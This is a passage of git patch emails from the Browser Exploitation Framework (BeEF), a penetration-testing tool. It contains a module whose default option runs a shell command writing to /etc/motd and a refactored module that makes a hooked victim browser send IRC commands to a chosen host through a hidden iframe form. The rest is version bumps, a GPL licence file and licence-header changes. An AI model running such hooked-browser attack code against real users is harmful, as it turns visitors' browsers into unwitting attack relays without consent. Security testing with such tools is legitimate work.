+	{'name'=>'rhost',   'ui_label' => 'Remote Host', 'value' => '127.0.0.1'},
+	{'name'=>'rport',   'ui_label' => 'Remote Port', 'value' => '8000'},
+	{'name'=>'timeout', 'ui_label' => 'Timeout (s)', 'value' => '15'},
+	{'name'=>'cmd',     'ui_label' => 'Commands',    'description' => 'Enter shell commands to execute.', 'type'=>'textarea', 'value'=>'(echo Welcome to BeEF!) > /etc/motd', 'width'=>'200px' },
+    ]
+  end
+
+  def post_execute
+	save({'result' => @datastore['result']}) if not @datastore['result'].nil?
+	save({'fail'   => @datastore['fail']})   if not @datastore['fail'].nil?
+  end
+
+end

From b756065d2a5786b5579cb05f75e5396ee806d13d Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Wed, 31 Oct 2012 00:04:54 +1030
Subject: [PATCH 087/397] Update Inter-Protocol IRC module to use
 `beef.dom.createIframeIpecForm`

---
 modules/ipec/inter_protocol_irc/command.js | 39 +++++++++-------------
 modules/ipec/inter_protocol_irc/module.rb  | 10 +++---
 2 files changed, 20 insertions(+), 29 deletions(-)

diff --git a/modules/ipec/inter_protocol_irc/command.js b/modules/ipec/inter_protocol_irc/command.js
index 47eae7975..1a86b7c37 100644
--- a/modules/ipec/inter_protocol_irc/command.js
+++ b/modules/ipec/inter_protocol_irc/command.js
@@ -22,34 +22,25 @@
  */
 beef.execute(function() {
 
-	var server = '<%= @server %>';
-	var port = '<%= @port %>';
-	var nick = '<%= @nick %>';
+	var rhost   = '<%= @rhost %>';
+	var rport   = '<%= @rport %>';
+	var nick    = '<%= @nick %>';
 	var channel = '<%= @channel %>';
 	var message = '<%= @message %>';
 
-	var target = "http://" + server + ":" + port;
-	var irc_commands= "NICK " + nick + "\n";
-	irc_commands+= "USER " + nick + " 8 * : " + nick + " user\n";
-	irc_commands+= "JOIN " + channel + "\n";
-	irc_commands+= "PRIVMSG " + channel + " :" + message + "\n";
-
-	var iframe = beef.dom.createInvisibleIframe();
-
-	var form = document.createElement('form');
-	form.setAttribute('action', target);
-	form.setAttribute('method', 'post');
-	form.setAttribute('enctype', 'multipart/form-data');
-
-	var input = document.createElement('input');
-	input.setAttribute('type', 'hidden');
-	input.setAttribute('name', 'data');
-	input.setAttribute('value', irc_commands);
-	form.appendChild(input);
-
-	iframe.contentWindow.document.body.appendChild(form);
-	form.submit();
+	var irc_commands = "NICK " + nick + "\n";
+	irc_commands    += "USER " + nick + " 8 * : " + nick + " user\n";
+	irc_commands    += "JOIN " + channel + "\n";
+	irc_commands    += "PRIVMSG " + channel + " :" + message + "\nQUIT\n";
 
+	// send commands
+	var irc_iframe = beef.dom.createIframeIpecForm(rhost, rport, irc_commands);
 	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=IRC command sent");
 
+	// clean up
+	cleanup = function() {
+		document.body.removeChild(irc_iframe);
+	}
+	setTimeout("cleanup()", 15000);
+
 });
diff --git a/modules/ipec/inter_protocol_irc/module.rb b/modules/ipec/inter_protocol_irc/module.rb
index cad8d0380..7bfef2503 100644
--- a/modules/ipec/inter_protocol_irc/module.rb
+++ b/modules/ipec/inter_protocol_irc/module.rb
@@ -17,11 +17,11 @@ class Inter_protocol_irc < BeEF::Core::Command
 
   def self.options
     return [
-	{'name' => 'server', 'ui_label' => 'IRC Server', 'value' => '127.0.0.1'},
-	{'name' => 'port', 'ui_label' => 'Port', 'value' => '6667'},
-        {'name' => 'nick', 'ui_label' => 'Username', 'value' => 'user1234__'},
-        {'name' => 'channel', 'ui_label' => 'Channel', 'value' => '#channel1'},
-        {'name' => 'message', 'ui_label' => 'Message', 'value' => 'Message sent from the Browser Exploitation Framework!'}
+	{'name' => 'rhost',   'ui_label' => 'IRC Server', 'value' => '127.0.0.1'},
+	{'name' => 'rport',   'ui_label' => 'Port',       'value' => '6667'},
+        {'name' => 'nick',    'ui_label' => 'Username',   'value' => 'user1234__'},
+        {'name' => 'channel', 'ui_label' => 'Channel',    'value' => '#channel1'},
+        {'name' => 'message', 'ui_label' => 'Message',    'value' => 'Message sent from the Browser Exploitation Framework!'}
     ]
   end
 

From b62c79196167b2680ec4460c7d83a18611f3f652 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Thu, 1 Nov 2012 17:46:03 +1030
Subject: [PATCH 088/397] Version updated to 0.4.3.9-alpha

---
 VERSION     | 2 +-
 config.yaml | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/VERSION b/VERSION
index c01c6178d..9b4e49e62 100644
--- a/VERSION
+++ b/VERSION
@@ -14,4 +14,4 @@
 #   limitations under the License.
 #
 
-0.4.3.8-alpha
+0.4.3.9-alpha
diff --git a/config.yaml b/config.yaml
index b021a3a3b..6c5f97020 100644
--- a/config.yaml
+++ b/config.yaml
@@ -16,7 +16,7 @@
 # BeEF Configuration file
 
 beef:
-    version: '0.4.3.8-alpha'
+    version: '0.4.3.9-alpha'
     debug: false
 
     restrictions:

From bfba800a93483e6df035ade19aa236b2683a0eb1 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Thu, 1 Nov 2012 17:59:59 +1030
Subject: [PATCH 089/397] Revert "Version updated to 0.4.3.9-alpha"

This reverts commit b62c79196167b2680ec4460c7d83a18611f3f652.
---
 VERSION     | 2 +-
 config.yaml | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/VERSION b/VERSION
index 9b4e49e62..c01c6178d 100644
--- a/VERSION
+++ b/VERSION
@@ -14,4 +14,4 @@
 #   limitations under the License.
 #
 
-0.4.3.9-alpha
+0.4.3.8-alpha
diff --git a/config.yaml b/config.yaml
index 6c5f97020..b021a3a3b 100644
--- a/config.yaml
+++ b/config.yaml
@@ -16,7 +16,7 @@
 # BeEF Configuration file
 
 beef:
-    version: '0.4.3.9-alpha'
+    version: '0.4.3.8-alpha'
     debug: false
 
     restrictions:

From 0e3dbb23ee724caab7efc15285ef890cbfd96cd6 Mon Sep 17 00:00:00 2001
From: Wade Alcorn <wade@bindshell.net>
Date: Fri, 2 Nov 2012 13:56:17 +1000
Subject: [PATCH 090/397] Added new licence file

---
 docs/COPYING | 348 +++++++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 348 insertions(+)
 create mode 100644 docs/COPYING

diff --git a/docs/COPYING b/docs/COPYING
new file mode 100644
index 000000000..a6eac6ac6
--- /dev/null
+++ b/docs/COPYING
@@ -0,0 +1,348 @@
+COPYING -- Describes the terms under which the Browser Exploitation
+Framework (BeEF) is distributed. A copy of the GNU General Public License
+(GPL) is appended to this file.
+
+BeEF (Browser Exploitation Framework) is (C) 2006-2012 Wade Alcorn.
+
+This program is free software; you may redistribute and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation; Version 2 with the clarifications and exceptions
+described below. This guarantees your right to use, modify, and
+redistribute this software under certain conditions. If you wish to embed
+BeEF technology into proprietary software, we sell alternative licenses
+(contact wade@bindshell.net).
+
+Note that the GPL places important restrictions on "derived works", yet it
+does not provide a detailed definition of that term. To avoid
+misunderstandings, we interpret that term as broadly as copyright law
+allows. For example, we consider an application to constitute a "derived
+work" for the purpose of this license if it does any of the following:
+* Integrates source code from BeEF.
+* Reads or includes BeEF copyrighted hook, core components, tests, modules 
+  or extensions.
+* Executes BeEF and parses the results.
+* Integrates/includes/aggregates BeEF into a proprietary executable
+  installer, such as those produced by InstallShield.
+* Links to a library or executes a program that does any of the above
+
+The term "BeEF" should be taken to also include any portions or derived
+works of BeEF. This list is not exclusive, but is meant to clarify our
+interpretation of derived works with some common examples. Our
+interpretation applies only to BeEF - we do not speak for other people's
+GPL works.
+
+If you have any questions about the GPL licensing restrictions on using
+BeEF in non-GPL works, we would be happy to help. As mentioned above,
+we also offer alternative license to integrate BeEF into proprietary
+applications and appliances.
+
+If you received these files with a written license agreement or contract
+stating terms other than the terms above, then that alternative license
+agreement takes precedence over these comments.
+
+Source is provided to this software because we believe users have a right
+to know exactly what a program is going to do before they run it.
+
+Source code also allows you to fix bugs and add new features. You are
+highly encouraged to send your changes to wade@bindshell.net for possible
+incorporation into the main distribution. By sending these changes to the
+BeEF developers, to the mailing lists, or via Git pull request, checking
+them into the BeEF source code repository, it is understood (unless you
+specify otherwise) that you are offering the BeEF project the unlimited,
+non-exclusive right to reuse, modify, and relicense the code. BeEF will
+always be available Open Source, but this is important because the
+inability to relicense code has caused devastating problems for other Free
+Software projects (such as KDE and NASM). If you wish to specify special
+license conditions of your contributions, just say so when you send them.
+
+This program is distributed in the hope that it will be useful, but
+WITHOUT ANY WARRANTY; without even the implied warranty of
+MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+General Public License v2.0 for more details at
+http://www.gnu.org/licenses/gpl-2.0.html, or below
+
+****************************************************************************
+
+                    GNU GENERAL PUBLIC LICENSE
+                       Version 2, June 1991
+
+ Copyright (C) 1989, 1991 Free Software Foundation, Inc.,
+ 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
+ Everyone is permitted to copy and distribute verbatim copies
+ of this license document, but changing it is not allowed.
+
+                            Preamble
+
+  The licenses for most software are designed to take away your
+freedom to share and change it.  By contrast, the GNU General Public
+License is intended to guarantee your freedom to share and change free
+software--to make sure the software is free for all its users.  This
+General Public License applies to most of the Free Software
+Foundation's software and to any other program whose authors commit to
+using it.  (Some other Free Software Foundation software is covered by
+the GNU Lesser General Public License instead.)  You can apply it to
+your programs, too.
+
+  When we speak of free software, we are referring to freedom, not
+price.  Our General Public Licenses are designed to make sure that you
+have the freedom to distribute copies of free software (and charge for
+this service if you wish), that you receive source code or can get it
+if you want it, that you can change the software or use pieces of it
+in new free programs; and that you know you can do these things.
+
+  To protect your rights, we need to make restrictions that forbid
+anyone to deny you these rights or to ask you to surrender the rights.
+These restrictions translate to certain responsibilities for you if you
+distribute copies of the software, or if you modify it.
+
+  For example, if you distribute copies of such a program, whether
+gratis or for a fee, you must give the recipients all the rights that
+you have.  You must make sure that they, too, receive or can get the
+source code.  And you must show them these terms so they know their
+rights.
+
+  We protect your rights with two steps: (1) copyright the software, and
+(2) offer you this license which gives you legal permission to copy,
+distribute and/or modify the software.
+
+  Also, for each author's protection and ours, we want to make certain
+that everyone understands that there is no warranty for this free
+software.  If the software is modified by someone else and passed on, we
+want its recipients to know that what they have is not the original, so
+that any problems introduced by others will not reflect on the original
+authors' reputations.
+
+  Finally, any free program is threatened constantly by software
+patents.  We wish to avoid the danger that redistributors of a free
+program will individually obtain patent licenses, in effect making the
+program proprietary.  To prevent this, we have made it clear that any
+patent must be licensed for everyone's free use or not licensed at all.
+
+  The precise terms and conditions for copying, distribution and
+modification follow.
+
+                    GNU GENERAL PUBLIC LICENSE
+   TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
+
+  0. This License applies to any program or other work which contains
+a notice placed by the copyright holder saying it may be distributed
+under the terms of this General Public License.  The "Program", below,
+refers to any such program or work, and a "work based on the Program"
+means either the Program or any derivative work under copyright law:
+that is to say, a work containing the Program or a portion of it,
+either verbatim or with modifications and/or translated into another
+language.  (Hereinafter, translation is included without limitation in
+the term "modification".)  Each licensee is addressed as "you".
+
+Activities other than copying, distribution and modification are not
+covered by this License; they are outside its scope.  The act of
+running the Program is not restricted, and the output from the Program
+is covered only if its contents constitute a work based on the
+Program (independent of having been made by running the Program).
+Whether that is true depends on what the Program does.
+
+  1. You may copy and distribute verbatim copies of the Program's
+source code as you receive it, in any medium, provided that you
+conspicuously and appropriately publish on each copy an appropriate
+copyright notice and disclaimer of warranty; keep intact all the
+notices that refer to this License and to the absence of any warranty;
+and give any other recipients of the Program a copy of this License
+along with the Program.
+
+You may charge a fee for the physical act of transferring a copy, and
+you may at your option offer warranty protection in exchange for a fee.
+
+  2. You may modify your copy or copies of the Program or any portion
+of it, thus forming a work based on the Program, and copy and
+distribute such modifications or work under the terms of Section 1
+above, provided that you also meet all of these conditions:
+
+    a) You must cause the modified files to carry prominent notices
+    stating that you changed the files and the date of any change.
+
+    b) You must cause any work that you distribute or publish, that in
+    whole or in part contains or is derived from the Program or any
+    part thereof, to be licensed as a whole at no charge to all third
+    parties under the terms of this License.
+
+    c) If the modified program normally reads commands interactively
+    when run, you must cause it, when started running for such
+    interactive use in the most ordinary way, to print or display an
+    announcement including an appropriate copyright notice and a
+    notice that there is no warranty (or else, saying that you provide
+    a warranty) and that users may redistribute the program under
+    these conditions, and telling the user how to view a copy of this
+    License.  (Exception: if the Program itself is interactive but
+    does not normally print such an announcement, your work based on
+    the Program is not required to print an announcement.)
+
+These requirements apply to the modified work as a whole.  If
+identifiable sections of that work are not derived from the Program,
+and can be reasonably considered independent and separate works in
+themselves, then this License, and its terms, do not apply to those
+sections when you distribute them as separate works.  But when you
+distribute the same sections as part of a whole which is a work based
+on the Program, the distribution of the whole must be on the terms of
+this License, whose permissions for other licensees extend to the
+entire whole, and thus to each and every part regardless of who wrote it.
+
+Thus, it is not the intent of this section to claim rights or contest
+your rights to work written entirely by you; rather, the intent is to
+exercise the right to control the distribution of derivative or
+collective works based on the Program.
+
+In addition, mere aggregation of another work not based on the Program
+with the Program (or with a work based on the Program) on a volume of
+a storage or distribution medium does not bring the other work under
+the scope of this License.
+
+  3. You may copy and distribute the Program (or a work based on it,
+under Section 2) in object code or executable form under the terms of
+Sections 1 and 2 above provided that you also do one of the following:
+
+    a) Accompany it with the complete corresponding machine-readable
+    source code, which must be distributed under the terms of Sections
+    1 and 2 above on a medium customarily used for software interchange; or,
+
+    b) Accompany it with a written offer, valid for at least three
+    years, to give any third party, for a charge no more than your
+    cost of physically performing source distribution, a complete
+    machine-readable copy of the corresponding source code, to be
+    distributed under the terms of Sections 1 and 2 above on a medium
+    customarily used for software interchange; or,
+
+    c) Accompany it with the information you received as to the offer
+    to distribute corresponding source code.  (This alternative is
+    allowed only for noncommercial distribution and only if you
+    received the program in object code or executable form with such
+    an offer, in accord with Subsection b above.)
+
+The source code for a work means the preferred form of the work for
+making modifications to it.  For an executable work, complete source
+code means all the source code for all modules it contains, plus any
+associated interface definition files, plus the scripts used to
+control compilation and installation of the executable.  However, as a
+special exception, the source code distributed need not include
+anything that is normally distributed (in either source or binary
+form) with the major components (compiler, kernel, and so on) of the
+operating system on which the executable runs, unless that component
+itself accompanies the executable.
+
+If distribution of executable or object code is made by offering
+access to copy from a designated place, then offering equivalent
+access to copy the source code from the same place counts as
+distribution of the source code, even though third parties are not
+compelled to copy the source along with the object code.
+
+  4. You may not copy, modify, sublicense, or distribute the Program
+except as expressly provided under this License.  Any attempt
+otherwise to copy, modify, sublicense or distribute the Program is
+void, and will automatically terminate your rights under this License.
+However, parties who have received copies, or rights, from you under
+this License will not have their licenses terminated so long as such
+parties remain in full compliance.
+
+  5. You are not required to accept this License, since you have not
+signed it.  However, nothing else grants you permission to modify or
+distribute the Program or its derivative works.  These actions are
+prohibited by law if you do not accept this License.  Therefore, by
+modifying or distributing the Program (or any work based on the
+Program), you indicate your acceptance of this License to do so, and
+all its terms and conditions for copying, distributing or modifying
+the Program or works based on it.
+
+  6. Each time you redistribute the Program (or any work based on the
+Program), the recipient automatically receives a license from the
+original licensor to copy, distribute or modify the Program subject to
+these terms and conditions.  You may not impose any further
+restrictions on the recipients' exercise of the rights granted herein.
+You are not responsible for enforcing compliance by third parties to
+this License.
+
+  7. If, as a consequence of a court judgment or allegation of patent
+infringement or for any other reason (not limited to patent issues),
+conditions are imposed on you (whether by court order, agreement or
+otherwise) that contradict the conditions of this License, they do not
+excuse you from the conditions of this License.  If you cannot
+distribute so as to satisfy simultaneously your obligations under this
+License and any other pertinent obligations, then as a consequence you
+may not distribute the Program at all.  For example, if a patent
+license would not permit royalty-free redistribution of the Program by
+all those who receive copies directly or indirectly through you, then
+the only way you could satisfy both it and this License would be to
+refrain entirely from distribution of the Program.
+
+If any portion of this section is held invalid or unenforceable under
+any particular circumstance, the balance of the section is intended to
+apply and the section as a whole is intended to apply in other
+circumstances.
+
+It is not the purpose of this section to induce you to infringe any
+patents or other property right claims or to contest validity of any
+such claims; this section has the sole purpose of protecting the
+integrity of the free software distribution system, which is
+implemented by public license practices.  Many people have made
+generous contributions to the wide range of software distributed
+through that system in reliance on consistent application of that
+system; it is up to the author/donor to decide if he or she is willing
+to distribute software through any other system and a licensee cannot
+impose that choice.
+
+This section is intended to make thoroughly clear what is believed to
+be a consequence of the rest of this License.
+
+  8. If the distribution and/or use of the Program is restricted in
+certain countries either by patents or by copyrighted interfaces, the
+original copyright holder who places the Program under this License
+may add an explicit geographical distribution limitation excluding
+those countries, so that distribution is permitted only in or among
+countries not thus excluded.  In such case, this License incorporates
+the limitation as if written in the body of this License.
+
+  9. The Free Software Foundation may publish revised and/or new versions
+of the General Public License from time to time.  Such new versions will
+be similar in spirit to the present version, but may differ in detail to
+address new problems or concerns.
+
+Each version is given a distinguishing version number.  If the Program
+specifies a version number of this License which applies to it and "any
+later version", you have the option of following the terms and conditions
+either of that version or of any later version published by the Free
+Software Foundation.  If the Program does not specify a version number of
+this License, you may choose any version ever published by the Free Software
+Foundation.
+
+  10. If you wish to incorporate parts of the Program into other free
+programs whose distribution conditions are different, write to the author
+to ask for permission.  For software which is copyrighted by the Free
+Software Foundation, write to the Free Software Foundation; we sometimes
+make exceptions for this.  Our decision will be guided by the two goals
+of preserving the free status of all derivatives of our free software and
+of promoting the sharing and reuse of software generally.
+
+                            NO WARRANTY
+
+  11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY
+FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW.  EXCEPT WHEN
+OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES
+PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED
+OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
+MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE.  THE ENTIRE RISK AS
+TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU.  SHOULD THE
+PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING,
+REPAIR OR CORRECTION.
+
+  12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
+WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR
+REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES,
+INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING
+OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED
+TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY
+YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER
+PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE
+POSSIBILITY OF SUCH DAMAGES.
+
+                     END OF TERMS AND CONDITIONS
+
+****************************************************************************
+

From f70248276440b22a85668f2b7244405f51874cb1 Mon Sep 17 00:00:00 2001
From: Wade Alcorn <wade@bindshell.net>
Date: Fri, 2 Nov 2012 13:57:33 +1000
Subject: [PATCH 091/397] Added new boilerplate licence file

---
 docs/boilerplate | 3 +++
 1 file changed, 3 insertions(+)
 create mode 100644 docs/boilerplate

diff --git a/docs/boilerplate b/docs/boilerplate
new file mode 100644
index 000000000..d76a93909
--- /dev/null
+++ b/docs/boilerplate
@@ -0,0 +1,3 @@
+Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+Browser Exploitation Framework (BeEF) - http://beefproject.com
+See the file 'doc/COPYING' for copying permission
\ No newline at end of file

From 447f61c71b4876135b6614fc3d1ea84cdc270975 Mon Sep 17 00:00:00 2001
From: Wade Alcorn <wade@bindshell.net>
Date: Fri, 2 Nov 2012 14:00:44 +1000
Subject: [PATCH 092/397] Changed license header and stdout banner

---
 core/main/console/banners.rb | 28 +++++++++-------------------
 1 file changed, 9 insertions(+), 19 deletions(-)

diff --git a/core/main/console/banners.rb b/core/main/console/banners.rb
index cb460a0b2..bdf2c72fa 100644
--- a/core/main/console/banners.rb
+++ b/core/main/console/banners.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Core
@@ -46,6 +36,7 @@ module Banners
         data += "Blog: http://blog.beefproject.com\n"
         data += "Wiki: https://github.com/beefproject/beef/wiki\n"
         print_more data
+        print_info "Project Creator: " + "Wade Alcorn".red + " (@WadeAlcorn)"
     end
 
     #
@@ -106,13 +97,12 @@ module Banners
     #
     def print_loaded_extensions
       extensions = BeEF::Extensions.get_loaded
-      print_info "#{extensions.size} extensions loaded:"
+      print_info "#{extensions.size} extensions enabled."
       output = ''
-      
-      
-      extensions.each do |key,ext|
-        output += "#{ext['name']}\n"
-      end
+
+      #extensions.each do |key,ext|
+      #  output += "#{ext['name']}\n"
+      #end
       
       print_more output
     end

From b68df3d024ef1b09d4c7f94a3bd72aa461d9f6e7 Mon Sep 17 00:00:00 2001
From: Wade Alcorn <wade@bindshell.net>
Date: Fri, 2 Nov 2012 14:05:14 +1000
Subject: [PATCH 093/397] Changed license header

---
 Gemfile                                       |   16 +-
 Rakefile                                      |   16 +-
 VERSION                                       |   16 +-
 beef                                          |   16 +-
 config.yaml                                   |   16 +-
 core/api.rb                                   |   16 +-
 core/api/extension.rb                         |   16 +-
 core/api/extensions.rb                        |   16 +-
 core/api/main/configuration.rb                |   16 +-
 core/api/main/migration.rb                    |   16 +-
 core/api/main/network_stack/assethandler.rb   |   16 +-
 core/api/main/server.rb                       |   16 +-
 core/api/main/server/hook.rb                  |   16 +-
 core/api/module.rb                            |   16 +-
 core/api/modules.rb                           |   16 +-
 core/bootstrap.rb                             |   16 +-
 core/core.rb                                  |   16 +-
 core/extension.rb                             |   16 +-
 core/extensions.rb                            |   16 +-
 core/filters.rb                               |   16 +-
 core/filters/base.rb                          |   16 +-
 core/filters/browser.rb                       |   16 +-
 core/filters/command.rb                       |   16 +-
 core/filters/http.rb                          |   16 +-
 core/filters/page.rb                          |   16 +-
 core/hbmanager.rb                             |   16 +-
 core/main/client/are.js                       |   17 +-
 core/main/client/beef.js                      |   17 +-
 core/main/client/browser.js                   |   17 +-
 core/main/client/browser/cookie.js            |  209 ++-
 core/main/client/browser/popup.js             |   67 +-
 core/main/client/dom.js                       |   17 +-
 core/main/client/encode/base64.js             |   17 +-
 core/main/client/encode/json.js               |   17 +-
 core/main/client/geolocation.js               |   17 +-
 core/main/client/hardware.js                  |   17 +-
 core/main/client/init.js                      |   17 +-
 core/main/client/lib/evercookie.js            |   17 +-
 core/main/client/logger.js                    |   17 +-
 core/main/client/mitb.js                      |   17 +-
 core/main/client/net.js                       |   17 +-
 core/main/client/net/dns.js                   |   17 +-
 core/main/client/net/local.js                 |   17 +-
 core/main/client/net/portscanner.js           |  117 +-
 core/main/client/net/requester.js             |   17 +-
 core/main/client/os.js                        |   17 +-
 core/main/client/session.js                   |   17 +-
 core/main/client/timeout.js                   |   17 +-
 core/main/client/updater.js                   |   17 +-
 core/main/client/websocket.js                 |   17 +-
 core/main/command.rb                          |   16 +-
 core/main/configuration.rb                    |   16 +-
 core/main/console/commandline.rb              |   16 +-
 core/main/constants/browsers.rb               |   16 +-
 core/main/constants/commandmodule.rb          |   16 +-
 core/main/constants/distributedengine.rb      |   16 +-
 core/main/constants/hardware.rb               |   16 +-
 core/main/constants/os.rb                     |   16 +-
 core/main/crypto.rb                           |   16 +-
 core/main/distributed_engine/models/rules.rb  |   16 +-
 core/main/handlers/browserdetails.rb          |   16 +-
 core/main/handlers/commands.rb                |   16 +-
 core/main/handlers/hookedbrowsers.rb          |   16 +-
 core/main/handlers/modules/beefjs.rb          |   16 +-
 core/main/handlers/modules/command.rb         |   16 +-
 core/main/logger.rb                           |   16 +-
 core/main/migration.rb                        |   16 +-
 core/main/models/browserdetails.rb            |   16 +-
 core/main/models/command.rb                   |   16 +-
 core/main/models/commandmodule.rb             |   16 +-
 core/main/models/hookedbrowser.rb             |   16 +-
 core/main/models/log.rb                       |   16 +-
 core/main/models/optioncache.rb               |   16 +-
 core/main/models/result.rb                    |   16 +-
 core/main/models/user.rb                      |   16 +-
 core/main/network_stack/api.rb                |   16 +-
 core/main/network_stack/assethandler.rb       |   16 +-
 .../handlers/dynamicreconstruction.rb         |   16 +-
 .../main/network_stack/websocket/websocket.rb |   16 +-
 core/main/rest/api.rb                         |   16 +-
 core/main/rest/handlers/admin.rb              |   16 +-
 core/main/rest/handlers/categories.rb         |   16 +-
 core/main/rest/handlers/hookedbrowsers.rb     |   16 +-
 core/main/rest/handlers/logs.rb               |   16 +-
 core/main/rest/handlers/modules.rb            |   16 +-
 core/main/router/api.rb                       |   16 +-
 core/main/router/router.rb                    |   16 +-
 core/main/server.rb                           |   16 +-
 core/module.rb                                |   16 +-
 core/modules.rb                               |   16 +-
 core/ruby.rb                                  |   16 +-
 core/ruby/hash.rb                             |   16 +-
 core/ruby/module.rb                           |   16 +-
 core/ruby/object.rb                           |   16 +-
 core/ruby/patches/dm-do-adapter/adapter.rb    |   16 +-
 core/ruby/print.rb                            |   16 +-
 core/ruby/security.rb                         |   16 +-
 core/ruby/string.rb                           |   16 +-
 core/settings.rb                              |   16 +-
 extensions/admin_ui/api/command.rb            |   16 +-
 extensions/admin_ui/api/handler.rb            |   16 +-
 extensions/admin_ui/classes/httpcontroller.rb |   16 +-
 extensions/admin_ui/classes/session.rb        |   16 +-
 extensions/admin_ui/config.yaml               |   16 +-
 extensions/admin_ui/constants/agents.rb       |   16 +-
 extensions/admin_ui/constants/icons.rb        |   16 +-
 .../authentication/authentication.rb          |   16 +-
 extensions/admin_ui/controllers/logs/logs.rb  |   16 +-
 .../admin_ui/controllers/modules/modules.rb   |   16 +-
 .../admin_ui/controllers/panel/panel.rb       |   16 +-
 extensions/admin_ui/extension.rb              |   16 +-
 extensions/admin_ui/handlers/ui.rb            |   16 +-
 .../admin_ui/media/javascript/ext-beef.js     |   17 +-
 .../media/javascript/ui/authentication.js     |   17 +-
 .../media/javascript/ui/panel/DataGrid.js     |   17 +-
 .../javascript/ui/panel/DistributedEngine.js  |   17 +-
 .../javascript/ui/panel/HackVertorTab.js      |   17 +-
 .../media/javascript/ui/panel/HooksTab.js     |   17 +-
 .../media/javascript/ui/panel/Logout.js       |   17 +-
 .../media/javascript/ui/panel/MainPanel.js    |   17 +-
 .../javascript/ui/panel/PanelStatusBar.js     |   17 +-
 .../media/javascript/ui/panel/PanelViewer.js  |   17 +-
 .../media/javascript/ui/panel/WelcomeTab.js   |   17 +-
 .../media/javascript/ui/panel/ZombieTab.js    |   17 +-
 .../media/javascript/ui/panel/ZombieTabs.js   |   17 +-
 .../media/javascript/ui/panel/ZombiesMgr.js   |   17 +-
 .../media/javascript/ui/panel/common.js       |   17 +-
 .../ui/panel/tabs/ZombieTabCommands.js        |   17 +-
 .../ui/panel/tabs/ZombieTabDetails.js         |   17 +-
 .../javascript/ui/panel/tabs/ZombieTabIpec.js |   17 +-
 .../javascript/ui/panel/tabs/ZombieTabLogs.js |   17 +-
 .../ui/panel/tabs/ZombieTabRider.js           |   17 +-
 .../ui/panel/tabs/ZombieTabXssRays.js         |  333 +++--
 .../javascript/ui/panel/zombiesTreeList.js    |   17 +-
 .../media/javascript/ux/PagingStore.js        | 1127 ++++++++---------
 .../admin_ui/media/javascript/ux/StatusBar.js |   17 +-
 .../media/javascript/ux/TabCloseMenu.js       |  137 +-
 extensions/autoloader/config.yaml             |   16 +-
 extensions/autoloader/extension.rb            |   16 +-
 extensions/autoloader/model.rb                |   16 +-
 extensions/console/config.yaml                |   16 +-
 extensions/console/extension.rb               |   16 +-
 extensions/console/lib/command_dispatcher.rb  |   16 +-
 .../console/lib/command_dispatcher/command.rb |   16 +-
 .../console/lib/command_dispatcher/core.rb    |   16 +-
 .../console/lib/command_dispatcher/target.rb  |   16 +-
 extensions/console/lib/shellinterface.rb      |   16 +-
 extensions/console/shell.rb                   |   16 +-
 extensions/customhook/api.rb                  |   16 +-
 extensions/customhook/config.yaml             |   16 +-
 extensions/customhook/extension.rb            |   16 +-
 extensions/customhook/handler.rb              |   16 +-
 extensions/demos/api.rb                       |   16 +-
 extensions/demos/config.yaml                  |   16 +-
 extensions/demos/extension.rb                 |   16 +-
 .../demos/html/butcher/jquery-1.5.min.js      |   17 +-
 extensions/evasion/config.yaml                |   16 +-
 extensions/evasion/evasion.rb                 |   16 +-
 extensions/evasion/extension.rb               |   16 +-
 extensions/evasion/helper.rb                  |   16 +-
 extensions/evasion/obfuscation/base_64.rb     |   16 +-
 extensions/evasion/obfuscation/minify.rb      |   16 +-
 extensions/evasion/obfuscation/scramble.rb    |   16 +-
 extensions/evasion/obfuscation/whitespace.rb  |   16 +-
 extensions/events/api.rb                      |   16 +-
 extensions/events/config.yaml                 |   16 +-
